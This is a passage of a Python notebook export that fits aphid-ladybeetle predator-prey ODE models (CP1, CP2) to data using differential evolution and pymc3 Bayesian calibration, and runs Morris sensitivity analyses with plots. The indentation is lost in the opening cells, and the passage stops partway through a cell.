time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
realization_ODE_CP1 = CP1_ode_solver(
y0,
(t0, tf + days_to_forecast),
time_range,
*parameters_realization
)
u_realization, v_realization = realization_ODE_CP1.y
pest_time_derivative_array = calculate_pest_time_derivative_series(
time_range,
u_realization,
v_realization,
CP1_model,
parameters_realization
)
qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[30]:
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
try:
Si = ee_analyze(
problem_info,
parameter_values,
qoi_sensitivity_outputs[:, time_point],
num_levels=grid_level,
seed=seed
)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
for idx, param_name in enumerate(problem_info['names']):
df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
except:
continue
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si
# In[31]:
df_sigmai
# In[32]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_derivative_CP1.png", dpi=300)
plt.show()
# In[33]:
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_derivative_CP1.png", dpi=300)
plt.show()
# ## Bayesian calibration
# In[34]:
# Theano op wrapping the CP1 ODE solve so pymc3 can treat the deterministic
# model as a symbolic node during Bayesian calibration. Input/output types
# must match the wrapper's call site in the pm.Model block below.
@theano.compile.ops.as_op(
    itypes=[
        t.dvector,
        t.dscalar, # r1
        t.dscalar, # a1
        t.dscalar, # u0
        t.dscalar, # v0
    ],
    otypes=[t.dmatrix]
)
def CP1_ode_wrapper(time_exp, r1, a1, u0, v0):
    # Integrate over the span covered by the experimental time points only.
    time_span = (time_exp.min(), time_exp.max())
    args = [r1, a1]
    initial_conditions = np.array([u0, v0])
    y_model = solve_ivp(
        CP1_model,
        time_span,
        initial_conditions,
        t_eval=time_exp,
        method='LSODA',
        args=args
    )
    simulated_time = y_model.t  # NOTE(review): unused below; kept as-is
    simulated_ode_solution = y_model.y
    simulated_qoi1, simulated_qoi2 = simulated_ode_solution
    # Stack as columns -> shape (len(time_exp), 2), matching the layout of
    # the observations fed to the likelihood.
    concatenate_simulated_qoi = np.vstack([simulated_qoi1, simulated_qoi2]).T
    return concatenate_simulated_qoi
# In[35]:
# Observed series (fine grid) and common Bayesian-calibration settings.
observed_aphids = aphid_observed.Density.values.astype(np.float64)
observed_ladybeetles = ladybeetle_observed.Density.values.astype(np.float64)
observations_to_fit = np.vstack([observed_aphids, observed_ladybeetles]).T  # note the transpose here
time_observations = aphid_data.Time.values.astype(np.float64)
print("\n*** Performing Bayesian calibration ***")
print("-- Running Monte Carlo simulations:")
draws = 1000  # NOTE(review): unused below; pm.sample is called with draws=4500
start_time = time.time()
percent_calibration = 0.95
# Fine-level model for MLDA: only a1 is calibrated; r1 and the initial
# conditions are held fixed via pm.Data.
with pm.Model() as fine_model_CP1:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # One noise std-deviation per observed series (aphids, ladybeetles).
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP1_model",
        CP1_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit
    )
# Coarse dataset 1: every 4th observation, for the MLDA coarse chain.
coarse_steps_1 = 4
observed_aphids_coarse_1 = observed_aphids[::coarse_steps_1]
observed_ladybeetles_coarse_1 = observed_ladybeetles[::coarse_steps_1]
observations_to_fit_coarse_1 = np.vstack(
    [observed_aphids_coarse_1, observed_ladybeetles_coarse_1]
).T
time_observations_coarse_1 = time_observations[::coarse_steps_1]
# Coarse-level model 1: same structure as fine_model_CP1 but conditioned on
# the subsampled (every 4th point) observations.
with pm.Model() as coarse_model_1:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    standard_deviation = pm.Uniform("std_deviation", lower=1, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_1)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP1_model",
        CP1_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_1
    )
# Coarse dataset 2: every 2nd observation (defined but unused by MLDA below).
coarse_steps_2 = 2
observed_aphids_coarse_2 = observed_aphids[::coarse_steps_2]
observed_ladybeetles_coarse_2 = observed_ladybeetles[::coarse_steps_2]
observations_to_fit_coarse_2 = np.vstack(
    [observed_aphids_coarse_2, observed_ladybeetles_coarse_2]
).T
time_observations_coarse_2 = time_observations[::coarse_steps_2]
# Coarse-level model 2 (NOTE: not passed to pm.MLDA below, so it is unused).
with pm.Model() as coarse_model_2:
    # Prior distributions for the model's parameters
    # r1_ = pm.Uniform(
    #     "r1",
    #     lower=(1.0 - percent_calibration) * r1,
    #     upper=(1.0 + percent_calibration) * r1,
    # )
    r1_ = pm.Data("r1", r1)
    a1_ = pm.Uniform(
        "a1",
        lower=(1.0 - percent_calibration) * a1,
        upper=(1.0 + percent_calibration) * a1,
    )
    # Priors for initial conditions (fixed data here, not sampled)
    u0, v0 = y0
    u0_ = pm.Data("u0", u0)
    v0_ = pm.Data("v0", v0)
    # NOTE(review): lower=0 here, while the fine and coarse-1 models use
    # lower=1 -- looks accidental; confirm intended prior bounds.
    standard_deviation = pm.Uniform("std_deviation", lower=0, upper=1000, shape=2)  # note 'shape' here
    # Wrapper for time. We need it this way in order to change it for predictions
    time_calibration = pm.Data("time", time_observations_coarse_2)
    # Defining the deterministic formulation of the problem
    fitting_model = pm.Deterministic(
        "CP1_model",
        CP1_ode_wrapper(
            time_calibration,
            r1_,
            a1_,
            u0_,
            v0_
        ),
    )
    likelihood_model = pm.Normal(
        "likelihood_model", mu=fitting_model, sigma=standard_deviation, observed=observations_to_fit_coarse_2
    )
# Multi-Level Delayed Acceptance sampling: the coarse model screens
# proposals before the fine model evaluates them.
with fine_model_CP1:
    step = pm.MLDA(coarse_models=[coarse_model_1], subsampling_rates=[5])
    # step = pm.DEMetropolisZ()
    trace_calibration_CP1 = pm.sample(draws=4500, chains=4, cores=4, tune=1000, step=step, random_seed=seed)
duration = time.time() - start_time
print(f"-- Monte Carlo simulations done in {duration / 60:.3f} minutes")
# In[36]:
# Quick look at the a1 posterior.
plt.hist(trace_calibration_CP1['a1'], bins=35)
plt.show()
# In[37]:
# Variables to report/plot from the CP1 trace.
calibration_variable_names = [
    "std_deviation",
    "a1",
]
# In[38]:
# Posterior histogram (with mode) for each calibrated variable.
plot_step = 1
progress_bar = tqdm(calibration_variable_names)
for variable in progress_bar:
    pm.plot_posterior(
        trace_calibration_CP1[::plot_step],
        var_names=(f"{variable}"),
        kind="hist",
        round_to=4,
        point_estimate="mode"
    )
    plt.savefig(f"img/{variable}_posterior_cal_CP1.png")
# In[39]:
# Pairwise joint posterior (hexbin) with marginals.
az.plot_pair(
    trace_calibration_CP1,
    var_names=calibration_variable_names,
    kind="hexbin",
    fill_last=False,
    marginals=True,
    figsize=(10, 8),
)
plt.savefig("img/marginals_cal_CP1.png")
# In[40]:
# Posterior summary statistics table.
df_stats_summary = az.summary(
    data=trace_calibration_CP1,
    var_names=calibration_variable_names,
    kind='stats',
    round_to=15,  # floating-point rounding used in the summary
)
df_stats_summary  # notebook cell display
# Auxiliary functions to compute the Most Probable Value (MPV):
# In[41]:
from scipy.stats import gaussian_kde # to calculate MPV from KDE
def _scalar_rv_mvp_estimation(rv_realization_values: np.ndarray) -> np.ndarray:
num_of_realizations = len(rv_realization_values)
kernel = gaussian_kde(rv_realization_values)
equally_spaced_samples = np.linspace(
rv_realization_values.min(),
rv_realization_values.max(),
num_of_realizations
)
kde = kernel(equally_spaced_samples)
kde_max_index = np.argmax(kde)
rv_mpv_value = equally_spaced_samples[kde_max_index]
return rv_mpv_value
def calculate_rv_posterior_mpv(pm_trace, variable_names: list) -> dict:
    """Compute the KDE-based MPV for each named variable in a PyMC trace.

    Vector-valued variables are decomposed into per-dimension entries keyed
    as "name[dim]"; scalar variables are keyed by their plain name.
    """
    mpv_by_name = dict()
    progress = tqdm(variable_names)
    for name in progress:
        progress.set_description(f"Calculating MPV from KDE for {name}")
        realizations = pm_trace[f"{name}"]
        try:
            dimension_count = realizations.shape[1]
        except IndexError:
            dimension_count = 0
        if dimension_count == 0:
            # Scalar variable: one MPV for the whole chain.
            mpv_by_name[f"{name}"] = _scalar_rv_mvp_estimation(realizations)
        else:
            # Vector variable: one MPV per component.
            for dim in range(dimension_count):
                component_values = np.array(realizations[:, dim])
                component_mpv = _scalar_rv_mvp_estimation(component_values)
                mpv_by_name[f"{name}[{dim}]"] = component_mpv
    return mpv_by_name
def add_mpv_to_summary(arviz_summary: pd.DataFrame, rv_modes_dict: dict) -> pd.DataFrame:
    """Return a copy of the ArviZ summary with an extra 'mpv' column.

    The column is aligned by variable name (dict keys against the summary's
    index); the input frame is left unmodified.
    """
    summary_with_mpv = arviz_summary.copy()
    mpv_series = pd.Series(
        data=list(rv_modes_dict.values()),
        index=list(rv_modes_dict.keys()),
    )
    summary_with_mpv["mpv"] = mpv_series
    return summary_with_mpv
# In[42]:
# Append the MPV estimates to the summary table and persist it.
calibration_variable_mpv = calculate_rv_posterior_mpv(
    pm_trace=trace_calibration_CP1, variable_names=calibration_variable_names
)
df_stats_summary = add_mpv_to_summary(df_stats_summary, calibration_variable_mpv)
df_stats_summary.to_csv("csv/stats_summary_calibration_CP1.csv")  # save to CSV for later reference
df_stats_summary  # notebook cell display
# In[43]:
# 95% credible band (2.5th-97.5th percentiles) and posterior median fit.
percentile_cut = 2.5
y_min = np.percentile(trace_calibration_CP1["CP1_model"], percentile_cut, axis=0)
y_max = np.percentile(trace_calibration_CP1["CP1_model"], 100 - percentile_cut, axis=0)
y_fit = np.percentile(trace_calibration_CP1["CP1_model"], 50, axis=0)
# In[44]:
# Fitted trajectories with credible bands against the observations.
plt.figure(figsize=(15, 5))
plt.plot(
    time_observations,
    y_fit[:, 0],
    "r",
    label="Aphids (simulated)",
    marker="X",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 0], y_max[:, 0], color="r", alpha=0.2)
plt.plot(
    time_observations,
    y_fit[:, 1],
    "b",
    label="Ladybeetles (simulated)",
    marker="o",
    linestyle="-",
    markersize=10,
)
plt.fill_between(time_observations, y_min[:, 1], y_max[:, 1], color="b", alpha=0.2)
plt.plot(
    time_observations,
    aphid_observed.Density.values,
    label="Aphids data",
    marker="s",
    linestyle="",
    markersize=10
)
plt.plot(
    time_observations,
    ladybeetle_observed.Density.values,
    label="Ladybeetles data",
    marker="v",
    linestyle="",
    markersize=10
)
plt.legend(shadow=True)
plt.xlabel('Time', fontsize=15)
plt.ylabel('Population densities', fontsize=15)
plt.tight_layout()
plt.savefig("img/calibration_CP1.png", dpi=300)
plt.show()
# In[45]:
# Export the posterior realizations of the calibrated parameters
# (skipping std_deviation, the first entry) to CSV.
print("-- Exporting calibrated parameter to CSV")
start_time = time.time()
dict_realizations = dict()  # also keep the realizations in a Python dict
progress_bar = tqdm(calibration_variable_names[1:])
for variable in progress_bar:
    progress_bar.set_description(f"Gathering {variable} realizations")
    parameter_realization = trace_calibration_CP1.get_values(f"{variable}")
    dict_realizations[f"{variable}"] = parameter_realization
df_realizations = pd.DataFrame(dict_realizations)
df_realizations.to_csv("csv/calibration_realizations_CP1.csv")
duration = time.time() - start_time
print(f"-- Exported done in {duration:.3f} seconds")
# In[46]:
df_realizations  # notebook cell display
# # Constant Prey Growth FR2 model
# ## The parameter a1 doesn't have a maximum threshold
# In[47]:
import matplotlib.pyplot as plt
from numba import jit
import numpy as np # linear algebra
from scipy.integrate import solve_ivp # to solve ODE system
import pandas as pd
@jit(nopython=True)
def CP2_model(
    t,
    X,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Right-hand side of the CP2 model.

    Constant prey recruitment r1 with a saturating (Holling type-II-like)
    predation term a1*u*v/(a2 + a3*u); the predator density is constant.
    Returns (du/dt, dv/dt).
    """
    prey, predator = X
    predation = a1 * prey * predator / (a2 + a3 * prey)
    prey_rate = r1 - predation
    predator_rate = 0
    return prey_rate, predator_rate
def CP2_ode_solver(
    y0,
    t_span,
    t_eval,
    r1 = 1,
    a1 = 1,
    a2 = 1,
    a3 = 1,
):
    """Integrate the CP2 model with LSODA over t_span, sampled at t_eval.

    Returns the scipy `solve_ivp` result object (fields .t and .y).
    """
    parameter_tuple = (r1, a1, a2, a3)
    return solve_ivp(
        fun=CP2_model,
        t_span=t_span,
        y0=y0,
        t_eval=t_eval,
        args=parameter_tuple,
        method="LSODA",
    )
# Time grid spanning the observation window (no forecasting) and the
# observed series used for fitting.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, len(aphid_data.Time.values))
u_data = aphid_data.Density.values
v_data = ladybeetle_data.Density.values
# * We now need to calibrate the parameters of the function. Firstly, we have to define a least-squares residual error function:
# In[48]:
def CP2_least_squares_error_ode(
    par, time_exp, f_exp, fitting_model, initial_conditions
):
    """Weighted least-squares residual of the CP2 model against data.

    Parameters
    ----------
    par : sequence
        Model parameters forwarded to `fitting_model` after the fixed args.
    time_exp : np.ndarray
        Experimental time points; also defines the integration span.
    f_exp : sequence of two arrays
        Observed series (prey, predator) at `time_exp`.
    fitting_model : callable
        Solver with signature (initial_conditions, time_span, t_eval, *par)
        returning an object with attribute `.y` (2 x len(time_exp)).
    initial_conditions : array-like
        Initial state passed through to the solver.

    Returns
    -------
    float
        Mean of the two weighted sum-of-squares residuals, or 1e15 when the
        solver raises ValueError (penalizes infeasible parameter sets).
    """
    args = par
    f_exp1, f_exp2 = f_exp
    time_span = (time_exp.min(), time_exp.max())
    weighting_for_exp1_constraints = 1
    weighting_for_exp2_constraints = 1
    num_of_qoi = len(f_exp)
    try:
        y_model = fitting_model(initial_conditions, time_span, time_exp, *args)
        # Unpack the two simulated series directly (the solver's .t is unused).
        simulated_qoi1, simulated_qoi2 = y_model.y
        residual1 = f_exp1 - simulated_qoi1
        residual2 = f_exp2 - simulated_qoi2
        first_term = weighting_for_exp1_constraints * np.sum(residual1 ** 2.0)
        second_term = weighting_for_exp2_constraints * np.sum(residual2 ** 2.0)
        objective_function = 1 / num_of_qoi * (first_term + second_term)
    except ValueError:
        # Large penalty so the optimizer steers away from failing regions.
        objective_function = 1e15
    return objective_function
def callback_de(xk, convergence):
    """Progress callback for differential evolution.

    Prints the current best parameter vector; `convergence` is supplied by
    scipy but intentionally ignored.
    """
    print('parameters = {}\n'.format(xk))
# * Now we calibrate minimizing the residual applying the Differential Evolution method, a global optimization method, provided by `scipy`:
# In[49]:
from scipy import optimize
seed = 1234  # reproducibility seed, reused by SALib sampling and PyMC below
# Reference parameter values used to center the search bounds.
r1=0.0010874832697555675
a1=0.5539521690253332
a2=3.795469755292592e-06
a3=0.06797623577085109
# Bounds span 0.1x to 1.9x of each reference value.
denom_min = 0.1
denom_max = 1.9
bounds_CP2 = [
    ( ( r1 * denom_min ), ( r1 * denom_max ) ),  # r1
    ( ( a1 * denom_min ), ( a1 * denom_max ) ),  # a1
    ( ( a2 * denom_min ), ( a2 * denom_max ) ),  # a2
    ( ( a3 * denom_min ), ( a3 * denom_max ) ),  # a3
]
# Global least-squares calibration of the CP2 parameters.
result_CP2 = optimize.differential_evolution(
    CP2_least_squares_error_ode,
    bounds=bounds_CP2,
    args=(
        aphid_data.Time.values,
        [aphid_data.Density.values, ladybeetle_data.Density.values],
        CP2_ode_solver,
        y0,
    ),
    popsize=30,
    strategy="best1bin",
    tol=1e-5,
    recombination=0.95,
    mutation=0.6,
    maxiter=20000,  # 2000
    polish=True,
    disp=True,
    seed = seed,  # for the sake of reproducibility
    callback=callback_de,
    workers=-1,
)
print(result_CP2)
# * Retrieving the calibrated parameter values:
# In[50]:
# Re-simulate on a denser grid (100 points) with the calibrated parameters.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
(
    r1_deterministic,
    a1_deterministic,
    a2_deterministic,
    a3_deterministic,
) = result_CP2.x
solution_ODE_CP2 = CP2_ode_solver(
    y0,
    (t0, tf + days_to_forecast),
    time_range,
    *result_CP2.x
)
t_computed_CP2, y_computed_CP2 = solution_ODE_CP2.t, solution_ODE_CP2.y
u_CP2, v_CP2 = y_computed_CP2
# Calibrated parameter table for reporting.
parameters_dict = {
    "Model": "CP2",
    u"$r1$": r1_deterministic,
    u"$a1$": a1_deterministic,
    u"$a2$": a2_deterministic,
    u"$a3$": a3_deterministic,
}
print("r1=" + str(r1_deterministic) + "\n" + "a1=" + str(a1_deterministic) + "\n" + "a2=" + str(a2_deterministic) + "\n" + "a3=" + str(a3_deterministic) )
df_parameters_calibrated = pd.DataFrame.from_records([parameters_dict])
#print(df_parameters_calibrated.to_latex(index=False))
# #### Simulation
# In[51]:
import matplotlib.pyplot as plt
# Plot the deterministic CP2 fit against the observations.
aphid_observed = aphid_data[:].copy()
ladybeetle_observed = ladybeetle_data[:].copy()
plt.plot(t_computed_CP2, u_CP2, '-x')
plt.plot(aphid_data.Time.values, aphid_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.show()
plt.plot(t_computed_CP2, v_CP2, '-x')
plt.plot(ladybeetle_data.Time.values, ladybeetle_observed.Density.values, 'o', label='Observed')
plt.xlabel('Time')
plt.ylabel('Ladybeetle population')
plt.show()
# ## Sensitivity Analyses
# ### Least-Squares objective function
# In[52]:
from SALib.sample.morris import sample as ee_sample
# Morris screening of the least-squares objective: factors are the four
# CP2 parameters, perturbed +/-50% around their calibrated values.
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[53]:
from tqdm import tqdm
# Evaluate the objective once per Morris sample.
num_of_realizations = parameter_values.shape[0]
qoi_sensitivity_outputs = np.zeros(num_of_realizations)
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    residual_least_squares_result = CP2_least_squares_error_ode(
        parameters_realization,
        aphid_data.Time.values,
        [u_data, v_data],
        CP2_ode_solver,
        y0
    )
    qoi_sensitivity_outputs[realization_index] = residual_least_squares_result
# In[54]:
from SALib.analyze.morris import analyze as ee_analyze
# Normalized mu* per factor, sorted for the bar plot.
data_time = aphid_data.Time.values
num_of_experimental_points = data_time.shape[0]
df_Si = pd.DataFrame(columns=[*problem_info['names']])
Si = ee_analyze(problem_info, parameter_values, qoi_sensitivity_outputs, num_levels=grid_level, seed=seed)
Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
for idx, param_name in enumerate(problem_info['names']):
    df_Si.loc[0, param_name] = Si['mu_star_normalized'][idx]
df_Si = df_Si.T
df_Si.rename(columns={0: r'$\mu^*$'}, inplace=True)
df_Si.sort_values(by=r'$\mu^*$', ascending=False, inplace=True)
df_Si  # notebook cell display
# In[55]:
df_Si.T.plot.bar(rot=0, width=3, figsize=(9, 6))
plt.rcParams.update({'font.size': 16})
plt.ylabel(r"$\mu^*$")
plt.legend(fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/sensitivity_least_squares_CP2.png", dpi=300)
plt.show()
# ### Prey (pest) population
# In[56]:
from SALib.sample.morris import sample as ee_sample
# Morris screening of the prey trajectory itself (one QoI per time point).
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[57]:
from tqdm import tqdm
# Solve the ODE for every Morris sample; store the prey series per realization.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_CP2 = CP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_CP2.y
    qoi_sensitivity_outputs[realization_index, :] = u_realization
# In[58]:
from SALib.analyze.morris import analyze as ee_analyze
# Per-time-point Morris analysis: normalized mu* and sigma for each factor.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
df_Si['Time'] = time_range
df_sigmai['Time'] = time_range
for time_point in tqdm(range(num_of_time_points)):
    try:
        Si = ee_analyze(
            problem_info,
            parameter_values,
            qoi_sensitivity_outputs[:, time_point],
            num_levels=grid_level,
            seed=seed
        )
        Si['mu_star_normalized'] = Si['mu_star'] / Si['mu_star'].sum()
        sigmai_normalized = Si['sigma'] / Si['sigma'].sum()
        for idx, param_name in enumerate(problem_info['names']):
            df_Si.loc[time_point, param_name] = Si['mu_star_normalized'][idx]
            df_sigmai.loc[time_point, param_name] = sigmai_normalized[idx]
    except Exception:
        # Best-effort: skip time points where the analysis fails (e.g. a
        # zero-sum normalization); the row stays NaN and is dropped below.
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
        # still propagate.
        continue
# Order by time, drop the initial time point (index 0), and remove rows
# where the analysis failed (NaN).
df_Si.sort_values(by='Time', inplace=True)
df_Si.drop(index=0, inplace=True)
df_Si.dropna(inplace=True)
df_Si.reset_index(drop=True, inplace=True)
df_sigmai.sort_values(by='Time', inplace=True)
df_sigmai.drop(index=0, inplace=True)
df_sigmai.dropna(inplace=True)
df_sigmai.reset_index(drop=True, inplace=True)
valid_times = df_Si.Time.values
df_Si  # notebook cell display
# In[59]:
df_sigmai  # notebook cell display
# In[60]:
# Stacked bar plot of normalized mu* over time (every 2nd time point).
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_mu = valid_times[::step_to_plot]
df_Si[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
# NOTE(review): indexes the time array with the tick value `x`; assumes
# integer bar positions -- confirm.
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_mu[x]:.2f}")
plt.ylabel(r"Normalized $\mu^*$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_CP2.png", dpi=300)
plt.show()
# In[61]:
# Same stacked bar plot for the normalized sigma.
fig = plt.figure()
ax = plt.subplot(111)
step_to_plot = 2
valid_times_to_plot_sigma = valid_times[::step_to_plot]
df_sigmai[::step_to_plot].plot.bar(x='Time', rot=90, width=0.9, figsize=(20, 6), stacked=True, ax=ax)
ax.xaxis.set_major_formatter(lambda x, pos: f"{valid_times_to_plot_sigma[x]:.2f}")
plt.ylabel(r"Normalized $\sigma$")
plt.ylim([0, 1])
ax.legend(loc='upper center', bbox_to_anchor=(0.5, 1.15), ncol=len(problem_info['names']), fancybox=True, shadow=True)
plt.tight_layout()
plt.savefig("img/SA_pest_pop_sigma_CP2.png", dpi=300)
plt.show()
# ### Time-derivative of pest (prey) population
# In[62]:
def calculate_pest_time_derivative_series(
    time_array,
    u_array,
    v_array,
    ode_model,
    model_pars
):
    """Evaluate the prey time-derivative along a computed trajectory.

    At each time point, calls `ode_model(t, [u, v], *model_pars)` and keeps
    the first component (du/dt). Returns a numpy array of the same length
    as `time_array`.
    """
    derivative_values = [
        ode_model(current_time, [u_array[point_idx], v_array[point_idx]], *model_pars)[0]
        for point_idx, current_time in enumerate(time_array)
    ]
    return np.array(derivative_values)
# In[63]:
# Prey time-derivative along the calibrated CP2 trajectory.
pest_time_derivative_array = calculate_pest_time_derivative_series(
    t_computed_CP2,
    u_CP2,
    v_CP2,
    CP2_model,
    mean_values_params
)
pest_time_derivative_array  # notebook cell display
# In[64]:
plt.figure(figsize=(9, 7))
plt.plot(t_computed_CP2, u_CP2, '-x', label='Pest population')
plt.plot(t_computed_CP2, pest_time_derivative_array, '-o', label='Pest time derivative')
plt.xlabel('Time')
plt.ylabel('Aphid population')
plt.grid()
plt.legend(shadow=True)
plt.savefig("img/pest_derivative_CP2.png", dpi=300)
plt.show()
# In[65]:
# Morris screening of the prey time-derivative (one QoI per time point).
mean_values_params = [
    r1,
    a1,
    a2,
    a3,
]
factors_names = [
    r"$r1$",
    r"$a1$",
    r"$a2$",
    r"$a3$",
]
params_perturbations = 0.5
problem_info = {
    'num_vars': len(mean_values_params),
    'names': factors_names,
    'bounds': [[param - params_perturbations * param, param + params_perturbations * param] for param in mean_values_params]
}
grid_level = 4
num_of_trajectories = 20
parameter_values = ee_sample(problem_info, grid_level, num_of_trajectories, local_optimization=False, seed=seed)
# In[66]:
# Solve the ODE per Morris sample and record the derivative series.
t0 = aphid_data.Time.values.min()
tf = aphid_data.Time.values.max()
days_to_forecast = 0
time_range = np.linspace(t0, tf + days_to_forecast, 100)
num_of_realizations = parameter_values.shape[0]
num_of_time_points = time_range.shape[0]
qoi_sensitivity_outputs = np.zeros([num_of_realizations, num_of_time_points])
for realization_index, parameters_realization in tqdm(enumerate(parameter_values), total=len(parameter_values)):
    realization_ODE_CP2 = CP2_ode_solver(
        y0,
        (t0, tf + days_to_forecast),
        time_range,
        *parameters_realization
    )
    u_realization, v_realization = realization_ODE_CP2.y
    pest_time_derivative_array = calculate_pest_time_derivative_series(
        time_range,
        u_realization,
        v_realization,
        CP2_model,
        parameters_realization
    )
    qoi_sensitivity_outputs[realization_index, :] = pest_time_derivative_array
# In[67]:
# Per-time-point Morris analysis of the derivative QoI: normalized mu* and
# sigma for each factor.
df_Si = pd.DataFrame(columns=['Time', *problem_info['names']])
df_sigmai = pd.DataFrame(columns=['Time', *problem_info['names']])
